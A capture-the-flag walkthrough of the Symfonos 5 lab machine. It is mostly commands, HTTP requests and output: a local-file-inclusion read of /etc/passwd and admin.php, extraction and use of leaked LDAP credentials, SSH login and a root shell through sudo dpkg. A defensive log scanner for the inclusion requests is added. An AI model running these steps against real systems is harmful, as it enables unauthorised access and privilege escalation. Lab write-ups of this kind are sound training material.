Symfonos 5

Nmap scan for open ports and services:
```
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
|   256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_  256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl?
MAC Address: 00:0C:29:24:4D:63 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Webserver first:
```
┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5]
└─$ gobuster dir -u http://192.168.58.136 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.58.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2021/04/30 22:21:49 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 207]
/home.php             (Status: 200) [Size: 1650]
/icons/               (Status: 403) [Size: 279]
/static/              (Status: 200) [Size: 1745]
/admin.php            (Status: 200) [Size: 1650]
/logout.php           (Status: 200) [Size: 1650]
/portraits.php        (Status: 200) [Size: 165]
/server-status/       (Status: 403) [Size: 279]
===============================================================
2021/04/30 22:23:37 Finished
===============================================================
```
`/home.php` is redirected to `/admin.php`.

Response in Burp Suite from `home.php`:
```
HTTP/1.1 302 Found
Date: Sat, 01 May 2021 08:34:16 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=4sghjkemg8h2cq6dvuo5tn3quv; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: admin.php
Content-Length: 962
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<link rel="stylesheet" type="text/css" href="/static/bootstrap.min.css">
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
  <a class="navbar-brand" href="home.php">symfonos</a>
  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor02" aria-controls="navbarColor02" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>
  <div class="collapse navbar-collapse" id="navbarColor02">
    <ul class="navbar-nav mr-auto">
      <li class="nav-item">
        <a class="nav-link" href="home.php">Home</a>
      </li>
      <li class="nav-item">
        <a class="nav-link" href="home.php?url=http://127.0.0.1/portraits.php">Portraits</a>
      </li>
      <li class="nav-item">
        <a class="nav-link" href="logout.php">Logout</a>
      </li>
    </ul>
  </div>
</nav><br />
<center>
<h3>Under Developement</h3></center>
</body>
```
The `url` parameter of `home.php` can be used for local file inclusion (LFI).

Trying to read some local files, like `/etc/passwd`:
```
GET /home.php?url=/etc/passwd HTTP/1.1
Host: 192.168.58.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
Result:
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
```
This works, so trying for the `admin.php` file:
```
GET /home.php?url=/var/www/html/admin.php HTTP/1.1
Host: 192.168.58.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
Result:
```
<?php
session_start();

if(isset($_SESSION["loggedin"]) && $_SESSION["loggedin"] === true){
    header("location: home.php");
    exit;
}

function authLdap($username, $password) {
    $ldap_ch = ldap_connect("ldap://172.18.0.22");
    ldap_set_option($ldap_ch, LDAP_OPT_PROTOCOL_VERSION, 3);
    if (!$ldap_ch) {
        return FALSE;
    }
    $bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
    if (!$bind) {
        return FALSE;
    }
    $filter = "(&(uid=$username)(userPassword=$password))";
    $result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);
    if (!$result) {
        return FALSE;
    }
    $info = ldap_get_entries($ldap_ch, $result);
    if (!($info) || ($info["count"] == 0)) {
        return FALSE;
    }
    return TRUE;
}

if(isset($_GET['username']) && isset($_GET['password'])){
    $username = urldecode($_GET['username']);
    $password = urldecode($_GET['password']);
    $bIsAuth = authLdap($username, $password);
    if (! $bIsAuth ) {
        $msg = "Invalid login";
    } else {
        $_SESSION["loggedin"] = true;
        header("location: home.php");
        exit;
    }
}
?>
```
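A defender-side check for the file-inclusion requests above, written as an added example (not part of the original write-up): it parses Apache combined-format access-log lines and flags `home.php` requests whose `url=` value is anything other than the loopback Portraits link the application itself emits. The log lines are constructed for the example, not taken from the target.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" access-log line: client, ident, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# The only url= value the application itself links to is the Portraits page on the loopback host.
ALLOWED_PREFIX = "http://127.0.0.1/"

def classify_url_param(value):
    """Return a reason string when a decoded url= value looks like a file-inclusion attempt, else None."""
    v = unquote(value)  # parse_qs already decoded once; decode again to catch double-encoding
    if v.startswith(ALLOWED_PREFIX):
        return None
    if v.startswith("/"):
        return "absolute local path"
    if "../" in v:
        return "path traversal"
    if "://" in v:
        return "non-allowlisted URL"
    return "unexpected value"

def scan_log(lines):
    """Return (client_ip, request_target, reason) for every home.php request with a suspicious url= value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access-log line
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/home.php"):
            continue
        for value in parse_qs(parts.query).get("url", []):
            reason = classify_url_param(value)
            if reason:
                hits.append((m.group("ip"), m.group("target"), reason))
    return hits

# Constructed sample log lines modelled on the requests shown above (not real server logs).
SAMPLE_LOG = [
    '192.168.58.1 - - [01/May/2021:08:34:16 +0000] "GET /home.php?url=http://127.0.0.1/portraits.php HTTP/1.1" 200 1650 "-" "Mozilla/5.0"',
    '192.168.58.1 - - [01/May/2021:08:35:02 +0000] "GET /home.php?url=/etc/passwd HTTP/1.1" 200 1390 "-" "Mozilla/5.0"',
    '192.168.58.1 - - [01/May/2021:08:36:41 +0000] "GET /home.php?url=/var/www/html/admin.php HTTP/1.1" 200 1207 "-" "Mozilla/5.0"',
    '192.168.58.1 - - [01/May/2021:08:37:15 +0000] "GET /home.php?url=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1390 "-" "Mozilla/5.0"',
    '192.168.58.1 - - [01/May/2021:08:38:00 +0000] "GET /admin.php HTTP/1.1" 200 1650 "-" "Mozilla/5.0"',
]
```

Running `scan_log(SAMPLE_LOG)` reports the three inclusion attempts and ignores both the legitimate Portraits link and the plain `/admin.php` request.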
Useful information for LDAP:
```
┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5]
└─$ ldapsearch -h 192.168.58.136 -p 389 -b "dc=symfonos,dc=local" -w "qMDdyZh3cT6eeAWD" -D "cn=admin,dc=symfonos,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
```
Credentials (base64-encoded):
```
┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5]
└─$ echo "e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=" | base64 -d
{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5]
└─$ echo "Y2V0a0tmNHdDdUhDOUZFVA==" | base64 -d
cetkKf4wCuHC9FET
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5]
└─$ ssh zeus@192.168.58.136
The authenticity of host '192.168.58.136 (192.168.58.136)' can't be established.
ECDSA key fingerprint is SHA256:0LrOVGfXWfj1Vtdo1krp85ZDlnsb3DDJFap9cOF5WoA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.58.136' (ECDSA) to the list of known hosts.
zeus@192.168.58.136's password:
Permission denied, please try again.
zeus@192.168.58.136's password:
Linux symfonos5 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jan  6 18:27:11 2020 from 192.168.65.128
zeus@symfonos5:~$ id
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
```
zeus@symfonos5:~$ sudo -l
Matching Defaults entries for zeus on symfonos5:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on symfonos5:
    (root) NOPASSWD: /usr/bin/dpkg
```
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access (source: https://gtfobins.github.io/gtfobins/dpkg/).
```
zeus@symfonos5:~$ sudo dpkg -l
...[SNIP]...
ii  file                          1:5.35-4+deb10u1                amd64        Recognize the type of data in a file using "magic" numbers
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
```
Root access. Final part.
```
# cat /root/proof.txt
Congrats on rooting symfonos:5!
[ZEUS ASCII art]
Contact me via Twitter @zayotic to give feedback!
#
```